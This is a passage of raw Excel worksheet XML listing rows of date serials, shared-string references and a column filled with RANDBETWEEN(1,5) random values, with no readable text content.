        <v>312</v>
      </c>
      <c r="E20266" t="s">
        <v>18219</v>
      </c>
      <c r="F20266">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20267" s="1">
        <v>43121.868946759256</v>
      </c>
      <c r="C20267" t="s">
        <v>2986</v>
      </c>
      <c r="D20267" t="s">
        <v>232</v>
      </c>
      <c r="E20267" t="s">
        <v>18220</v>
      </c>
      <c r="F20267">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20268" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20268" s="1">
        <v>43121.868171296293</v>
      </c>
      <c r="C20268" t="s">
        <v>222</v>
      </c>
      <c r="D20268" t="s">
        <v>2214</v>
      </c>
      <c r="E20268" t="s">
        <v>18221</v>
      </c>
      <c r="F20268">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20269" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20269" s="1">
        <v>43121.822129629632</v>
      </c>
      <c r="C20269" t="s">
        <v>144</v>
      </c>
      <c r="E20269" s="2" t="s">
        <v>18222</v>
      </c>
      <c r="F20269">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20270" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A20270" s="1">
        <v>43121.798159722224</v>
      </c>
      <c r="C20270" t="s">
        <v>139</v>
      </c>
      <c r="D20270" t="s">
        <v>86</v>
      </c>
      <c r="E20270" s="2" t="s">
        <v>18223</v>
      </c>
      <c r="F20270">
        <f t="shared" ca="1" si="316"/>
        <v>5</v>
      </c>
    </row>
    <row r="20271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20271" s="1">
        <v>43121.752511574072</v>
      </c>
      <c r="C20271" t="s">
        <v>140</v>
      </c>
      <c r="D20271" t="s">
        <v>141</v>
      </c>
      <c r="E20271" t="s">
        <v>18224</v>
      </c>
      <c r="F20271">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20272" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A20272" s="1">
        <v>43121.68677083333</v>
      </c>
      <c r="C20272" t="s">
        <v>355</v>
      </c>
      <c r="D20272" t="s">
        <v>46</v>
      </c>
      <c r="E20272" s="2" t="s">
        <v>18225</v>
      </c>
      <c r="F20272">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20273" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20273" s="1">
        <v>43121.50980324074</v>
      </c>
      <c r="C20273" t="s">
        <v>10</v>
      </c>
      <c r="D20273" t="s">
        <v>36</v>
      </c>
      <c r="E20273" t="s">
        <v>18226</v>
      </c>
      <c r="F20273">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20274" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20274" s="1">
        <v>43121.320625</v>
      </c>
      <c r="C20274" t="s">
        <v>1325</v>
      </c>
      <c r="E20274" t="s">
        <v>18227</v>
      </c>
      <c r="F20274">
        <f t="shared" ca="1" si="316"/>
        <v>5</v>
      </c>
    </row>
    <row r="20275" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20275" s="1">
        <v>43121.307569444441</v>
      </c>
      <c r="C20275" t="s">
        <v>60</v>
      </c>
      <c r="E20275" t="s">
        <v>18228</v>
      </c>
      <c r="F20275">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20276" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20276" s="1">
        <v>43121.250740740739</v>
      </c>
      <c r="C20276" t="s">
        <v>60</v>
      </c>
      <c r="E20276" t="s">
        <v>18229</v>
      </c>
      <c r="F20276">
        <f t="shared" ca="1" si="316"/>
        <v>4</v>
      </c>
    </row>
    <row r="20277" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20277" s="1">
        <v>43121.22457175926</v>
      </c>
      <c r="C20277" t="s">
        <v>197</v>
      </c>
      <c r="E20277" s="2" t="s">
        <v>18230</v>
      </c>
      <c r="F20277">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20278" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20278" s="1">
        <v>43120.955150462964</v>
      </c>
      <c r="C20278" t="s">
        <v>3443</v>
      </c>
      <c r="E20278" s="2" t="s">
        <v>18231</v>
      </c>
      <c r="F20278">
        <f t="shared" ca="1" si="316"/>
        <v>5</v>
      </c>
    </row>
    <row r="20279" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20279" s="1">
        <v>43120.899861111109</v>
      </c>
      <c r="C20279" t="s">
        <v>845</v>
      </c>
      <c r="E20279" s="2" t="s">
        <v>18232</v>
      </c>
      <c r="F20279">
        <f t="shared" ca="1" si="316"/>
        <v>5</v>
      </c>
    </row>
    <row r="20280" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20280" s="1">
        <v>43120.862766203703</v>
      </c>
      <c r="C20280" t="s">
        <v>139</v>
      </c>
      <c r="D20280" t="s">
        <v>251</v>
      </c>
      <c r="E20280" t="s">
        <v>18233</v>
      </c>
      <c r="F20280">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20281" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20281" s="1">
        <v>43120.692256944443</v>
      </c>
      <c r="C20281" t="s">
        <v>6</v>
      </c>
      <c r="D20281" t="s">
        <v>25</v>
      </c>
      <c r="E20281" s="2" t="s">
        <v>18234</v>
      </c>
      <c r="F20281">
        <f t="shared" ca="1" si="316"/>
        <v>2</v>
      </c>
    </row>
    <row r="20282" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20282" s="1">
        <v>43120.662256944444</v>
      </c>
      <c r="C20282" t="s">
        <v>48</v>
      </c>
      <c r="E20282" s="2" t="s">
        <v>18235</v>
      </c>
      <c r="F20282">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20283" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20283" s="1">
        <v>43120.345208333332</v>
      </c>
      <c r="C20283" t="s">
        <v>178</v>
      </c>
      <c r="F20283">
        <f t="shared" ca="1" si="316"/>
        <v>4</v>
      </c>
    </row>
    <row r="20284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20284" s="1">
        <v>43119.893275462964</v>
      </c>
      <c r="C20284" t="s">
        <v>1341</v>
      </c>
      <c r="D20284" t="s">
        <v>41</v>
      </c>
      <c r="E20284" t="s">
        <v>18236</v>
      </c>
      <c r="F20284">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20285" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20285" s="1">
        <v>43119.843634259261</v>
      </c>
      <c r="C20285" t="s">
        <v>454</v>
      </c>
      <c r="D20285" t="s">
        <v>821</v>
      </c>
      <c r="E20285" t="s">
        <v>18237</v>
      </c>
      <c r="F20285">
        <f t="shared" ca="1" si="316"/>
        <v>4</v>
      </c>
    </row>
    <row r="20286" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A20286" s="1">
        <v>43119.737071759257</v>
      </c>
      <c r="C20286" t="s">
        <v>45</v>
      </c>
      <c r="D20286" t="s">
        <v>336</v>
      </c>
      <c r="E20286" s="2" t="s">
        <v>18238</v>
      </c>
      <c r="F20286">
        <f t="shared" ca="1" si="316"/>
        <v>5</v>
      </c>
    </row>
    <row r="20287" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20287" s="1">
        <v>43119.730231481481</v>
      </c>
      <c r="C20287" t="s">
        <v>10</v>
      </c>
      <c r="D20287" t="s">
        <v>330</v>
      </c>
      <c r="E20287" t="s">
        <v>18239</v>
      </c>
      <c r="F20287">
        <f t="shared" ca="1" si="316"/>
        <v>2</v>
      </c>
    </row>
    <row r="20288" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20288" s="1">
        <v>43119.726365740738</v>
      </c>
      <c r="C20288" t="s">
        <v>41</v>
      </c>
      <c r="E20288" s="2" t="s">
        <v>18240</v>
      </c>
      <c r="F20288">
        <f t="shared" ca="1" si="316"/>
        <v>2</v>
      </c>
    </row>
    <row r="20289" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20289" s="1">
        <v>43119.698275462964</v>
      </c>
      <c r="C20289" t="s">
        <v>10</v>
      </c>
      <c r="D20289" t="s">
        <v>244</v>
      </c>
      <c r="E20289" s="2" t="s">
        <v>18241</v>
      </c>
      <c r="F20289">
        <f t="shared" ca="1" si="316"/>
        <v>4</v>
      </c>
    </row>
    <row r="20290" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20290" s="1">
        <v>43119.694386574076</v>
      </c>
      <c r="C20290" t="s">
        <v>10</v>
      </c>
      <c r="D20290" t="s">
        <v>6</v>
      </c>
      <c r="E20290" s="2" t="s">
        <v>18242</v>
      </c>
      <c r="F20290">
        <f t="shared" ref="F20290:F20353" ca="1" si="317">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="20291" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20291" s="1">
        <v>43119.688055555554</v>
      </c>
      <c r="C20291" t="s">
        <v>10</v>
      </c>
      <c r="D20291" t="s">
        <v>46</v>
      </c>
      <c r="E20291" s="2" t="s">
        <v>18243</v>
      </c>
      <c r="F20291">
        <f t="shared" ca="1" si="317"/>
        <v>3</v>
      </c>
    </row>
    <row r="20292" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20292" s="1">
        <v>43119.668310185189</v>
      </c>
      <c r="C20292" t="s">
        <v>10</v>
      </c>
      <c r="D20292" t="s">
        <v>158</v>
      </c>
      <c r="E20292" t="s">
        <v>18244</v>
      </c>
      <c r="F20292">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20293" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20293" s="1">
        <v>43119.596886574072</v>
      </c>
      <c r="C20293" t="s">
        <v>10</v>
      </c>
      <c r="D20293" t="s">
        <v>52</v>
      </c>
      <c r="E20293" t="s">
        <v>18245</v>
      </c>
      <c r="F20293">
        <f t="shared" ca="1" si="317"/>
        <v>4</v>
      </c>
    </row>
    <row r="20294" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20294" s="1">
        <v>43119.588252314818</v>
      </c>
      <c r="C20294" t="s">
        <v>10</v>
      </c>
      <c r="D20294" t="s">
        <v>112</v>
      </c>
      <c r="E20294" t="s">
        <v>18246</v>
      </c>
      <c r="F20294">
        <f t="shared" ca="1" si="317"/>
        <v>3</v>
      </c>
    </row>
    <row r="20295" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20295" s="1">
        <v>43119.562337962961</v>
      </c>
      <c r="C20295" t="s">
        <v>10</v>
      </c>
      <c r="D20295" t="s">
        <v>20</v>
      </c>
      <c r="E20295" t="s">
        <v>18247</v>
      </c>
      <c r="F20295">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20296" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20296" s="1">
        <v>43119.536805555559</v>
      </c>
      <c r="C20296" t="s">
        <v>10</v>
      </c>
      <c r="D20296" t="s">
        <v>667</v>
      </c>
      <c r="E20296" s="2" t="s">
        <v>18248</v>
      </c>
      <c r="F20296">
        <f t="shared" ca="1" si="317"/>
        <v>2</v>
      </c>
    </row>
    <row r="20297" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20297" s="1">
        <v>43119.501064814816</v>
      </c>
      <c r="C20297" t="s">
        <v>10</v>
      </c>
      <c r="D20297" t="s">
        <v>52</v>
      </c>
      <c r="E20297" t="s">
        <v>6267</v>
      </c>
      <c r="F20297">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20298" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20298" s="1">
        <v>43119.499618055554</v>
      </c>
      <c r="C20298" t="s">
        <v>10</v>
      </c>
      <c r="D20298" t="s">
        <v>163</v>
      </c>
      <c r="E20298" t="s">
        <v>18249</v>
      </c>
      <c r="F20298">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20299" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20299" s="1">
        <v>43119.483587962961</v>
      </c>
      <c r="C20299" t="s">
        <v>10</v>
      </c>
      <c r="D20299" t="s">
        <v>222</v>
      </c>
      <c r="E20299" t="s">
        <v>18250</v>
      </c>
      <c r="F20299">
        <f t="shared" ca="1" si="317"/>
        <v>3</v>
      </c>
    </row>
    <row r="20300" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20300" s="1">
        <v>43119.477488425924</v>
      </c>
      <c r="C20300" t="s">
        <v>10</v>
      </c>
      <c r="D20300" t="s">
        <v>17</v>
      </c>
      <c r="E20300" s="2" t="s">
        <v>18251</v>
      </c>
      <c r="F20300">
        <f t="shared" ca="1" si="317"/>
        <v>2</v>
      </c>
    </row>
    <row r="20301" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20301" s="1">
        <v>43119.472916666666</v>
      </c>
      <c r="C20301" t="s">
        <v>10</v>
      </c>
      <c r="D20301" t="s">
        <v>6</v>
      </c>
      <c r="E20301" s="2" t="s">
        <v>18252</v>
      </c>
      <c r="F20301">
        <f t="shared" ca="1" si="317"/>
        <v>5</v>
      </c>
    </row>
    <row r="20302" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20302" s="1">
        <v>43119.467719907407</v>
      </c>
      <c r="C20302" t="s">
        <v>10</v>
      </c>
      <c r="D20302" t="s">
        <v>229</v>
      </c>
      <c r="E20302" s="2" t="s">
        <v>18253</v>
      </c>
      <c r="F20302">
        <f t="shared" ca="1" si="317"/>
        <v>2</v>
      </c>
    </row>
    <row r="20303" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20303" s="1">
        <v>43119.448379629626</v>
      </c>
      <c r="C20303" t="s">
        <v>10</v>
      </c>
      <c r="D20303" t="s">
        <v>178</v>
      </c>
      <c r="E20303" t="s">
        <v>18254</v>
      </c>
      <c r="F20303">
        <f t="shared" ca="1" si="317"/>
        <v>5</v>
      </c>
    </row>
    <row r="20304" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20304" s="1">
        <v>43119.428495370368</v>
      </c>
      <c r="C20304" t="s">
        <v>10</v>
      </c>
      <c r="D20304" t="s">
        <v>17</v>
      </c>
      <c r="E20304" t="s">
        <v>18255</v>
      </c>
      <c r="F20304">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20305" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A20305" s="1">
        <v>43119.416608796295</v>
      </c>
      <c r="C20305" t="s">
        <v>6</v>
      </c>
      <c r="D20305" t="s">
        <v>25</v>
      </c>
      <c r="E20305" s="2" t="s">
        <v>18256</v>
      </c>
      <c r="F20305">
        <f t="shared" ca="1" si="317"/>
        <v>3</v>
      </c>
    </row>
    <row r="20306" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20306" s="1">
        <v>43119.413935185185</v>
      </c>
      <c r="C20306" t="s">
        <v>10</v>
      </c>
      <c r="D20306" t="s">
        <v>494</v>
      </c>
      <c r="E20306" t="s">
        <v>18257</v>
      </c>
      <c r="F20306">
        <f t="shared" ca="1" si="317"/>
        <v>3</v>
      </c>
    </row>
    <row r="20307" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20307" s="1">
        <v>43119.403344907405</v>
      </c>
      <c r="C20307" t="s">
        <v>50</v>
      </c>
      <c r="E20307" s="2" t="s">
        <v>18258</v>
      </c>
      <c r="F20307">
        <f t="shared" ca="1" si="317"/>
        <v>2</v>
      </c>
    </row>
    <row r="20308" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20308" s="1">
        <v>43119.392094907409</v>
      </c>
      <c r="C20308" t="s">
        <v>731</v>
      </c>
      <c r="E20308" s="2" t="s">
        <v>18259</v>
      </c>
      <c r="F20308">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20309" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20309" s="1">
        <v>43119.384097222224</v>
      </c>
      <c r="C20309" t="s">
        <v>71</v>
      </c>
      <c r="F20309">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20310" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A20310" s="1">
        <v>43119.381030092591</v>
      </c>
      <c r="C20310" t="s">
        <v>907</v>
      </c>
      <c r="E20310" s="2" t="s">
        <v>18260</v>
      </c>
      <c r="F20310">
        <f t="shared" ca="1" si="317"/>
        <v>4</v>
      </c>
    </row>
    <row r="20311" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20311" s="1">
        <v>43119.368217592593</v>
      </c>
      <c r="C20311" t="s">
        <v>6</v>
      </c>
      <c r="D20311" t="s">
        <v>2139</v>
      </c>
      <c r="E20311" t="s">
        <v>18261</v>
      </c>
      <c r="F20311">
        <f t="shared" ca="1" si="317"/>
        <v>5</v>
      </c>
    </row>
    <row r="20312" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20312" s="1">
        <v>43119.345254629632</v>
      </c>
      <c r="C20312" t="s">
        <v>1440</v>
      </c>
      <c r="D20312" t="s">
        <v>71</v>
      </c>
      <c r="E20312" s="2" t="s">
        <v>18262</v>
      </c>
      <c r="F20312">
        <f t="shared" ca="1" si="317"/>
        <v>3</v>
      </c>
    </row>
    <row r="20313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20313" s="1">
        <v>43119.337245370371</v>
      </c>
      <c r="C20313" t="s">
        <v>10</v>
      </c>
      <c r="D20313" t="s">
        <v>192</v>
      </c>
      <c r="E20313" t="s">
        <v>18263</v>
      </c>
      <c r="F20313">
        <f t="shared" ca="1" si="317"/>
        <v>5</v>
      </c>
    </row>
    <row r="20314" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20314" s="1">
        <v>43119.31585648148</v>
      </c>
      <c r="C20314" t="s">
        <v>454</v>
      </c>
      <c r="D20314" t="s">
        <v>163</v>
      </c>
      <c r="E20314" s="2" t="s">
        <v>18264</v>
      </c>
      <c r="F20314">
        <f t="shared" ca="1" si="317"/>
        <v>3</v>
      </c>
    </row>
    <row r="20315" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20315" s="1">
        <v>43119.29142361111</v>
      </c>
      <c r="C20315" t="s">
        <v>41</v>
      </c>
      <c r="E20315" s="2" t="s">
        <v>18265</v>
      </c>
      <c r="F20315">
        <f t="shared" ca="1" si="317"/>
        <v>2</v>
      </c>
    </row>
    <row r="20316" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A20316" s="1">
        <v>43119.250243055554</v>
      </c>
      <c r="C20316" t="s">
        <v>14</v>
      </c>
      <c r="E20316" s="2" t="s">
        <v>18266</v>
      </c>
      <c r="F20316">
        <f t="shared" ca="1" si="317"/>
        <v>3</v>
      </c>
    </row>
    <row r="20317" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20317" s="1">
        <v>43119.157523148147</v>
      </c>
      <c r="C20317" t="s">
        <v>319</v>
      </c>
      <c r="D20317" t="s">
        <v>320</v>
      </c>
      <c r="E20317" t="s">
        <v>18267</v>
      </c>
      <c r="F20317">
        <f t="shared" ca="1" si="317"/>
        <v>4</v>
      </c>
    </row>
    <row r="20318" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20318" s="1">
        <v>43119.152013888888</v>
      </c>
      <c r="C20318" t="s">
        <v>124</v>
      </c>
      <c r="D20318" t="s">
        <v>312</v>
      </c>
      <c r="E20318" s="2" t="s">
        <v>18268</v>
      </c>
      <c r="F20318">
        <f t="shared" ca="1" si="317"/>
        <v>5</v>
      </c>
    </row>
    <row r="20319" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20319" s="1">
        <v>43119.097500000003</v>
      </c>
      <c r="C20319" t="s">
        <v>71</v>
      </c>
      <c r="E20319" s="2" t="s">
        <v>18269</v>
      </c>
      <c r="F20319">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20320" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A20320" s="1">
        <v>43118.896354166667</v>
      </c>
      <c r="C20320" t="s">
        <v>140</v>
      </c>
      <c r="D20320" t="s">
        <v>141</v>
      </c>
      <c r="E20320" s="2" t="s">
        <v>18270</v>
      </c>
      <c r="F20320">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20321" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20321" s="1">
        <v>43118.887685185182</v>
      </c>
      <c r="C20321" t="s">
        <v>10</v>
      </c>
      <c r="D20321" t="s">
        <v>20</v>
      </c>
      <c r="E20321" t="s">
        <v>18271</v>
      </c>
      <c r="F20321">
        <f t="shared" ca="1" si="317"/>
        <v>2</v>
      </c>
    </row>
    <row r="20322" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20322" s="1">
        <v>43118.875474537039</v>
      </c>
      <c r="C20322" t="s">
        <v>73</v>
      </c>
      <c r="E20322" s="2" t="s">
        <v>18272</v>
      </c>
      <c r="F20322">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20323" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20323" s="1">
        <v>43118.811111111114</v>
      </c>
      <c r="C20323" t="s">
        <v>140</v>
      </c>
      <c r="D20323" t="s">
        <v>141</v>
      </c>
      <c r="E20323" t="s">
        <v>18273</v>
      </c>
      <c r="F20323">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20324" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20324" s="1">
        <v>43118.806342592594</v>
      </c>
      <c r="C20324" t="s">
        <v>10</v>
      </c>
      <c r="D20324" t="s">
        <v>6</v>
      </c>
      <c r="E20324" t="s">
        <v>18274</v>
      </c>
      <c r="F20324">
        <f t="shared" ca="1" si="317"/>
        <v>3</v>
      </c>
    </row>
    <row r="20325" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20325" s="1">
        <v>43118.805844907409</v>
      </c>
      <c r="C20325" t="s">
        <v>10</v>
      </c>
      <c r="D20325" t="s">
        <v>6</v>
      </c>
      <c r="E20325" s="2" t="s">
        <v>18275</v>
      </c>
      <c r="F20325">
        <f t="shared" ca="1" si="317"/>
        <v>3</v>
      </c>
    </row>
    <row r="20326" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20326" s="1">
        <v>43118.803356481483</v>
      </c>
      <c r="C20326" t="s">
        <v>10</v>
      </c>
      <c r="D20326" t="s">
        <v>6</v>
      </c>
      <c r="E20326" s="2" t="s">
        <v>18276</v>
      </c>
      <c r="F20326">
        <f t="shared" ca="1" si="317"/>
        <v>4</v>
      </c>
    </row>
    <row r="20327" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20327" s="1">
        <v>43118.788645833331</v>
      </c>
      <c r="C20327" t="s">
        <v>189</v>
      </c>
      <c r="D20327" t="s">
        <v>86</v>
      </c>
      <c r="E20327" t="s">
        <v>18277</v>
      </c>
      <c r="F20327">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20328" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20328" s="1">
        <v>43118.788599537038</v>
      </c>
      <c r="C20328" t="s">
        <v>333</v>
      </c>
      <c r="D20328" t="s">
        <v>1091</v>
      </c>
      <c r="E20328" t="s">
        <v>16197</v>
      </c>
      <c r="F20328">
        <f t="shared" ca="1" si="317"/>
        <v>4</v>
      </c>
    </row>
    <row r="20329" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20329" s="1">
        <v>43118.77380787037</v>
      </c>
      <c r="C20329" t="s">
        <v>10</v>
      </c>
      <c r="D20329" t="s">
        <v>6</v>
      </c>
      <c r="E20329" t="s">
        <v>18278</v>
      </c>
      <c r="F20329">
        <f t="shared" ca="1" si="317"/>
        <v>2</v>
      </c>
    </row>
    <row r="20330" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20330" s="1">
        <v>43118.760555555556</v>
      </c>
      <c r="C20330" t="s">
        <v>140</v>
      </c>
      <c r="D20330" t="s">
        <v>141</v>
      </c>
      <c r="E20330" t="s">
        <v>18279</v>
      </c>
      <c r="F20330">
        <f t="shared" ca="1" si="317"/>
        <v>4</v>
      </c>
    </row>
    <row r="20331" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A20331" s="1">
        <v>43118.742048611108</v>
      </c>
      <c r="C20331" t="s">
        <v>10</v>
      </c>
      <c r="D20331" t="s">
        <v>6</v>
      </c>
      <c r="E20331" s="2" t="s">
        <v>18280</v>
      </c>
      <c r="F20331">
        <f t="shared" ca="1" si="317"/>
        <v>4</v>
      </c>
    </row>
    <row r="20332" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20332" s="1">
        <v>43118.699317129627</v>
      </c>
      <c r="C20332" t="s">
        <v>6</v>
      </c>
      <c r="D20332" t="s">
        <v>602</v>
      </c>
      <c r="E20332" t="s">
        <v>18281</v>
      </c>
      <c r="F20332">
        <f t="shared" ca="1" si="317"/>
        <v>5</v>
      </c>
    </row>
    <row r="20333" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20333" s="1">
        <v>43118.697442129633</v>
      </c>
      <c r="C20333" t="s">
        <v>10</v>
      </c>
      <c r="D20333" t="s">
        <v>158</v>
      </c>
      <c r="E20333" t="s">
        <v>18282</v>
      </c>
      <c r="F20333">
        <f t="shared" ca="1" si="317"/>
        <v>3</v>
      </c>
    </row>
    <row r="20334" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20334" s="1">
        <v>43118.686585648145</v>
      </c>
      <c r="C20334" t="s">
        <v>10</v>
      </c>
      <c r="D20334" t="s">
        <v>14</v>
      </c>
      <c r="E20334" t="s">
        <v>18283</v>
      </c>
      <c r="F20334">
        <f t="shared" ca="1" si="317"/>
        <v>3</v>
      </c>
    </row>
    <row r="20335" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A20335" s="1">
        <v>43118.679432870369</v>
      </c>
      <c r="C20335" t="s">
        <v>10</v>
      </c>
      <c r="D20335" t="s">
        <v>244</v>
      </c>
      <c r="E20335" s="2" t="s">
        <v>18284</v>
      </c>
      <c r="F20335">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20336" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20336" s="1">
        <v>43118.678587962961</v>
      </c>
      <c r="C20336" t="s">
        <v>10</v>
      </c>
      <c r="D20336" t="s">
        <v>46</v>
      </c>
      <c r="E20336" t="s">
        <v>18285</v>
      </c>
      <c r="F20336">
        <f t="shared" ca="1" si="317"/>
        <v>4</v>
      </c>
    </row>
    <row r="20337" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20337" s="1">
        <v>43118.663576388892</v>
      </c>
      <c r="C20337" t="s">
        <v>10</v>
      </c>
      <c r="D20337" t="s">
        <v>46</v>
      </c>
      <c r="E20337" s="2" t="s">
        <v>18286</v>
      </c>
      <c r="F20337">
        <f t="shared" ca="1" si="317"/>
        <v>2</v>
      </c>
    </row>
    <row r="20338" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20338" s="1">
        <v>43118.65902777778</v>
      </c>
      <c r="C20338" t="s">
        <v>10</v>
      </c>
      <c r="D20338" t="s">
        <v>11</v>
      </c>
      <c r="E20338" t="s">
        <v>18287</v>
      </c>
      <c r="F20338">
        <f t="shared" ca="1" si="317"/>
        <v>4</v>
      </c>
    </row>
    <row r="20339" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20339" s="1">
        <v>43118.651250000003</v>
      </c>
      <c r="C20339" t="s">
        <v>10</v>
      </c>
      <c r="D20339" t="s">
        <v>178</v>
      </c>
      <c r="E20339" t="s">
        <v>18288</v>
      </c>
      <c r="F20339">
        <f t="shared" ca="1" si="317"/>
        <v>4</v>
      </c>
    </row>
    <row r="20340" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20340" s="1">
        <v>43118.640509259261</v>
      </c>
      <c r="C20340" t="s">
        <v>260</v>
      </c>
      <c r="E20340" s="2" t="s">
        <v>18289</v>
      </c>
      <c r="F20340">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
    <row r="20341" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20341" s="1">
        <v>43118.63480324074</v>
      </c>
      <c r="C20341" t="s">
        <v>10</v>
      </c>
      <c r="D20341" t="s">
        <v>52</v>
      </c>
      <c r="E20341" t="s">
        <v>18290</v>
      </c>
      <c r="F20341">
        <f t="shared" ca="1" si="317"/>
        <v>5</v>
      </c>
    </row>
    <row r="20342" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20342" s="1">
        <v>43118.609942129631</v>
      </c>
      <c r="C20342" t="s">
        <v>10</v>
      </c>
      <c r="D20342" t="s">
        <v>222</v>
      </c>
      <c r="E20342" t="s">
        <v>18291</v>
      </c>
      <c r="F20342">
        <f t="shared" ca="1" si="317"/>
        <v>1</v>
      </c>
    </row>
